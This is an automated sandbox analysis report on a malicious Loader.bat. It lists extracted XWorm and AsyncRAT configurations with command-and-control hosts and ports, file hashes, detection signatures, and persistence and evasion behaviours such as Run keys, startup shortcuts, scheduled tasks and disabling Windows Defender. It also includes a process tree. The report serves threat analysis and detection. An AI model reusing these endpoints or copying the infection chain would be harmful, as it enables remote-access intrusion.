Analysis
-
max time kernel
1050s -
max time network
1049s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
08-07-2024 18:06
Static task
static1
General
-
Target
Loader.bat
-
Size
264B
-
MD5
aa1529cc2a98b4e40322ada6fc14fa97
-
SHA1
ec76803006b95a46bf1fa9c522ec2b19db448d52
-
SHA256
6020eb188059a9b681b03092198c2d243a8e5ea5040b1d00d5809f56b4276c0d
-
SHA512
c2680fa4125eb3da74727bd159a361e19678c5cd1efaa096b038b89e7408af34948b4ba1eebd9722626041b1e7fc52fd2e6c516e52c482ab361565f554dcc14f
Malware Config
Extracted
xworm
unique-emotions.gl.at.ply.gg:54742
wiz.bounceme.net:6000
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
asyncrat
0.5.8
Default
card-buzz.gl.at.ply.gg:2497
uE6w2BW3TJU0
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/4656-243-0x000001C6B0510000-0x000001C6B051E000-memory.dmp disable_win_def -
Detect Xworm Payload 6 IoCs
resource yara_rule behavioral1/memory/1388-35-0x0000025AD0A50000-0x0000025AD0AB4000-memory.dmp family_xworm behavioral1/memory/4656-64-0x000001C6B04A0000-0x000001C6B0504000-memory.dmp family_xworm behavioral1/files/0x000800000002361d-169.dat family_xworm behavioral1/memory/4020-183-0x0000000000570000-0x0000000000586000-memory.dmp family_xworm behavioral1/memory/4020-238-0x000000001BFC0000-0x000000001BFCE000-memory.dmp family_xworm behavioral1/memory/4656-263-0x000001C6B1170000-0x000001C6B1186000-memory.dmp family_xworm -
Async RAT payload 4 IoCs
resource yara_rule behavioral1/memory/1388-35-0x0000025AD0A50000-0x0000025AD0AB4000-memory.dmp family_asyncrat behavioral1/memory/4656-64-0x000001C6B04A0000-0x000001C6B0504000-memory.dmp family_asyncrat behavioral1/memory/4656-120-0x000001C6B0500000-0x000001C6B0512000-memory.dmp family_asyncrat behavioral1/files/0x000800000002361c-175.dat family_asyncrat -
Blocklisted process makes network request 8 IoCs
flow pid Process 6 2944 powershell.exe 10 2944 powershell.exe 24 4656 powershell.exe 28 4656 powershell.exe 53 4656 powershell.exe 70 4656 powershell.exe 72 4656 powershell.exe 82 4656 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Powershell Invoke Web Request.
pid Process 2944 powershell.exe 4784 powershell.exe 1776 powershell.exe 512 powershell.exe 1420 powershell.exe 4784 powershell.exe 4656 powershell.exe 1344 powershell.exe 4952 powershell.exe 2944 powershell.exe 1388 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Control Panel\International\Geo\Nation Payload.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payload.lnk Payload.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payload.lnk Payload.exe -
Executes dropped EXE 19 IoCs
pid Process 4020 Payload.exe 4604 Stupido.exe 1060 Payload.exe 3012 Payload.exe 1604 Payload.exe 5100 Payload.exe 1532 Payload.exe 2172 Payload.exe 4532 Payload.exe 2656 Payload.exe 2280 Payload.exe 1060 Payload.exe 2404 Payload.exe 2032 Payload.exe 180 Payload.exe 4704 Payload.exe 1208 Payload.exe 1228 Payload.exe 844 Payload.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Payload = "C:\\Users\\Admin\\AppData\\Roaming\\Payload.exe" Payload.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\D: Payload.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\Z: svchost.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Payload svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe -
Kills process with taskkill 1 IoCs
pid Process 5032 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\83062dc3_0 svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\83062dc3_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001|\\Device\\HarddiskVolume2\\Users\\Admin\\AppData\\Local\\Temp\\Payload.exe%b{00000000-0000-0000-0000-000000000000}" svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\83062dc3_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F} svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\83062dc3_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\83062dc3_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\83062dc3_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 svchost.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe -
Modifies registry class 27 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133649356973903464" svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133649357141074860" svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133645876002653112" svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133645876006871730" svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133649356993122455" svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133645876009371909" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133649356471926827" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133649357198105865" svchost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1600 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2944 powershell.exe 2944 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 1776 powershell.exe 1776 powershell.exe 1776 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 512 powershell.exe 512 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 512 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3432 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 1388 powershell.exe Token: SeDebugPrivilege 4784 powershell.exe Token: SeIncreaseQuotaPrivilege 4784 powershell.exe Token: SeSecurityPrivilege 4784 powershell.exe Token: SeTakeOwnershipPrivilege 4784 powershell.exe Token: SeLoadDriverPrivilege 4784 powershell.exe Token: SeSystemProfilePrivilege 4784 powershell.exe Token: SeSystemtimePrivilege 4784 powershell.exe Token: SeProfSingleProcessPrivilege 4784 powershell.exe Token: SeIncBasePriorityPrivilege 4784 powershell.exe Token: SeCreatePagefilePrivilege 4784 powershell.exe Token: SeBackupPrivilege 4784 powershell.exe Token: SeRestorePrivilege 4784 powershell.exe Token: SeShutdownPrivilege 4784 powershell.exe Token: SeDebugPrivilege 4784 powershell.exe Token: SeSystemEnvironmentPrivilege 4784 powershell.exe Token: SeRemoteShutdownPrivilege 4784 powershell.exe Token: SeUndockPrivilege 4784 powershell.exe Token: SeManageVolumePrivilege 4784 powershell.exe Token: 33 4784 powershell.exe Token: 34 4784 powershell.exe Token: 35 4784 powershell.exe Token: 36 4784 powershell.exe Token: SeIncreaseQuotaPrivilege 4784 powershell.exe Token: SeSecurityPrivilege 4784 powershell.exe Token: SeTakeOwnershipPrivilege 4784 powershell.exe Token: SeLoadDriverPrivilege 4784 powershell.exe Token: SeSystemProfilePrivilege 4784 powershell.exe Token: SeSystemtimePrivilege 4784 powershell.exe Token: SeProfSingleProcessPrivilege 4784 powershell.exe Token: SeIncBasePriorityPrivilege 4784 powershell.exe Token: SeCreatePagefilePrivilege 4784 powershell.exe Token: SeBackupPrivilege 4784 powershell.exe Token: SeRestorePrivilege 4784 powershell.exe Token: SeShutdownPrivilege 4784 powershell.exe Token: SeDebugPrivilege 4784 powershell.exe Token: SeSystemEnvironmentPrivilege 4784 powershell.exe Token: SeRemoteShutdownPrivilege 4784 powershell.exe Token: SeUndockPrivilege 4784 powershell.exe Token: SeManageVolumePrivilege 4784 powershell.exe Token: 33 4784 powershell.exe Token: 34 4784 powershell.exe Token: 35 4784 powershell.exe Token: 36 4784 powershell.exe Token: SeIncreaseQuotaPrivilege 4784 powershell.exe Token: SeSecurityPrivilege 4784 powershell.exe Token: SeTakeOwnershipPrivilege 4784 powershell.exe Token: SeLoadDriverPrivilege 4784 powershell.exe Token: SeSystemProfilePrivilege 4784 powershell.exe Token: SeSystemtimePrivilege 4784 powershell.exe Token: SeProfSingleProcessPrivilege 4784 powershell.exe Token: SeIncBasePriorityPrivilege 4784 powershell.exe Token: SeCreatePagefilePrivilege 4784 powershell.exe Token: SeBackupPrivilege 4784 powershell.exe Token: SeRestorePrivilege 4784 powershell.exe Token: SeShutdownPrivilege 4784 powershell.exe Token: SeDebugPrivilege 4784 powershell.exe Token: SeSystemEnvironmentPrivilege 4784 powershell.exe Token: SeRemoteShutdownPrivilege 4784 powershell.exe Token: SeUndockPrivilege 4784 powershell.exe Token: SeManageVolumePrivilege 4784 powershell.exe Token: 33 4784 powershell.exe Token: 34 4784 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 4020 Payload.exe 4020 Payload.exe 4020 Payload.exe 4020 Payload.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4020 Payload.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2544 wrote to memory of 3416 2544 cmd.exe 90 PID 2544 wrote to memory of 3416 2544 cmd.exe 90 PID 3416 wrote to memory of 2944 3416 cmd.exe 91 PID 3416 wrote to memory of 2944 3416 cmd.exe 91 PID 2944 wrote to memory of 3932 2944 powershell.exe 96 PID 2944 wrote to memory of 3932 2944 powershell.exe 96 PID 3932 wrote to memory of 1940 3932 cmd.exe 98 PID 3932 wrote to memory of 1940 3932 cmd.exe 98 PID 3932 wrote to memory of 1388 3932 cmd.exe 99 PID 3932 wrote to memory of 1388 3932 cmd.exe 99 PID 1388 wrote to memory of 4784 1388 powershell.exe 101 PID 1388 wrote to memory of 4784 1388 powershell.exe 101 PID 1388 wrote to memory of 4692 1388 powershell.exe 112 PID 1388 wrote to memory of 4692 1388 powershell.exe 112 PID 4692 wrote to memory of 4412 4692 WScript.exe 105 PID 4692 wrote to memory of 4412 4692 WScript.exe 105 PID 4412 wrote to memory of 3112 4412 cmd.exe 107 PID 4412 wrote to memory of 3112 4412 cmd.exe 107 PID 4412 wrote to memory of 4656 4412 cmd.exe 108 PID 4412 wrote to memory of 4656 4412 cmd.exe 108 PID 4656 wrote to memory of 3432 4656 powershell.exe 56 PID 4656 wrote to memory of 2060 4656 powershell.exe 37 PID 4656 wrote to memory of 3344 4656 powershell.exe 55 PID 4656 wrote to memory of 1564 4656 powershell.exe 27 PID 4656 wrote to memory of 1760 4656 powershell.exe 30 PID 4656 wrote to memory of 4512 4656 powershell.exe 66 PID 4656 wrote to memory of 2344 4656 powershell.exe 41 PID 4656 wrote to memory of 1156 4656 powershell.exe 19 PID 4656 wrote to memory of 952 4656 powershell.exe 12 PID 4656 wrote to memory of 1148 4656 powershell.exe 18 PID 4656 wrote to memory of 2328 4656 powershell.exe 40 PID 4656 wrote to memory of 748 4656 powershell.exe 14 PID 4656 wrote to memory of 1720 4656 powershell.exe 36 PID 4656 wrote to memory of 1324 4656 powershell.exe 22 PID 4656 wrote to memory of 2292 4656 powershell.exe 39 PID 4656 wrote to memory of 1700 4656 powershell.exe 29 PID 4656 wrote to memory of 2484 4656 powershell.exe 72 PID 4656 wrote to memory of 1104 4656 powershell.exe 17 PID 4656 wrote to memory of 1692 4656 powershell.exe 35 PID 4656 wrote to memory of 1492 4656 powershell.exe 26 PID 4656 wrote to memory of 900 4656 powershell.exe 11 PID 4656 wrote to memory of 2868 4656 powershell.exe 52 PID 4656 wrote to memory of 3852 4656 powershell.exe 69 PID 4656 wrote to memory of 1480 4656 powershell.exe 25 PID 4656 wrote to memory of 1872 4656 powershell.exe 32 PID 4656 wrote to memory of 1868 4656 powershell.exe 75 PID 4656 wrote to memory of 1272 4656 powershell.exe 20 PID 4656 wrote to memory of 1664 4656 powershell.exe 28 PID 4656 wrote to memory of 1464 4656 powershell.exe 24 PID 4656 wrote to memory of 2840 4656 powershell.exe 50 PID 4656 wrote to memory of 3812 4656 powershell.exe 68 PID 4656 wrote to memory of 3220 4656 powershell.exe 65 PID 4656 wrote to memory of 1292 4656 powershell.exe 21 PID 4656 wrote to memory of 1032 4656 powershell.exe 16 PID 4656 wrote to memory of 2804 4656 powershell.exe 48 PID 4656 wrote to memory of 2008 4656 powershell.exe 34 PID 4656 wrote to memory of 3976 4656 powershell.exe 82 PID 4656 wrote to memory of 2000 4656 powershell.exe 33 PID 4656 wrote to memory of 2588 4656 powershell.exe 45 PID 4656 wrote to memory of 1404 4656 powershell.exe 23 PID 4656 wrote to memory of 1012 4656 powershell.exe 15 PID 4656 wrote to memory of 3568 4656 powershell.exe 57 PID 4656 wrote to memory of 2556 4656 powershell.exe 42 PID 4656 wrote to memory of 2580 4656 powershell.exe 44 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Checks processor information in registry
- Modifies registry class
PID:788 -
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:2572
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1104 -
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:1060
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:3012
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:1604
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:5100
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:1532
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:2172
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:4532
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:2656
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:2280
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:1060
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:2404
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:2032
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:180
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:4704
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:1208
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:1228
-
-
C:\Users\Admin\AppData\Roaming\Payload.exeC:\Users\Admin\AppData\Roaming\Payload.exe2⤵
- Executes dropped EXE
PID:844
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1148
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1156
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1480
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1492
-
